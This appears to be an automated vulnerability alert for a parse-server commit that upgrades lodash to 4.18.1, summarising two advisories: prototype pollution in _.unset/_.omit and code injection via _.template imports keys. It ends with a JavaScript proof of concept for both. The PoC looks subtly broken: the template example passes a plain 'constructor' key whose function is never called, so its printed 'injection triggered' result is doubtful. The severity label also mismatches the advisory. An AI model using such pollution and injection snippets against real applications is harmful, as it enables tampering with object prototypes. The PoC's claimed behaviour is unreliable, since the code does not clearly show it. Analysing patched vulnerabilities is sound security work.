Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: 19716ad
Author: Manuel
Date: 2026-04-03T18:01:02Z
Commit Message
fix: Bump lodash from 4.17.23 to 4.18.1 (#10393)
Pull Request
PR: #10393 - fix: Bump lodash from 4.17.23 to 4.18.1
Labels: None
Description:
Bumps [lodash](https://github.com/lodash/lodash) from 4.17.23 to 4.18.1.
Security Fixes
- GHSA-r5fr-rjxr-66jc (high): Code injection via `_.template` imports keys. Incomplete patch for CVE-2021-23337. imports keys containing forbidden identifier characters now throw an error.
- GHSA-f23m-r3pf-42rh (medium): Prototype pollution in `_.unset` / `_.omit` via constructor/prototype path traversal. constructor and prototype are now blocked unconditionally as non-terminal path k...
Analysis
Vulnerability Type: Prototype Pollution
Severity: High
Description
This commit patches prototype pollution vulnerabilities in lodash 4.17.23, specifically in the _.unset and _.omit functions where properties such as constructor and prototype could be traversed and modified, leading to prototype pollution. It also fixes a code injection issue in _.template via imports keys. The update blocks unsafe keys and throws errors on forbidden identifiers, preventing attackers from injecting or overwriting critical JavaScript object prototypes.
Affected Code
```javascript
_.unset(object, 'constructor.prototype.polluted') // allowed in 4.17.23: the path traverses into Object.prototype, leading to prototype pollution
_.template('...', { imports: { 'constructor': maliciousCode } }) // vulnerable to code injection via imports keys
```
Proof of Concept
```javascript
// Assumes lodash 4.17.23 is installed (npm install lodash@4.17.23); require() cannot select a version by itself
const _ = require('lodash');
const obj = {};

// Prototype pollution via _.unset: in 4.17.23 the path walks obj.constructor.prototype,
// i.e. Object.prototype, before operating on the leaf key. 4.18.1 blocks 'constructor'
// and 'prototype' as non-terminal path keys.
Object.prototype.polluted = true; // constructed marker so the traversal is observable
_.unset(obj, 'constructor.prototype.polluted');
console.log({}.polluted); // undefined on 4.17.23: the delete reached Object.prototype

// Code injection via _.template imports keys: imports is an option of _.template itself,
// not an argument of the compiled function. 4.18.1 throws when an imports key contains
// forbidden identifier characters.
try {
  _.template('Hello', { imports: { 'constructor': () => { throw new Error('Injected code'); } } })();
} catch (e) {
  console.log('Code injection triggered:', e.message);
}
```
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-04-03T18:02:14.355Z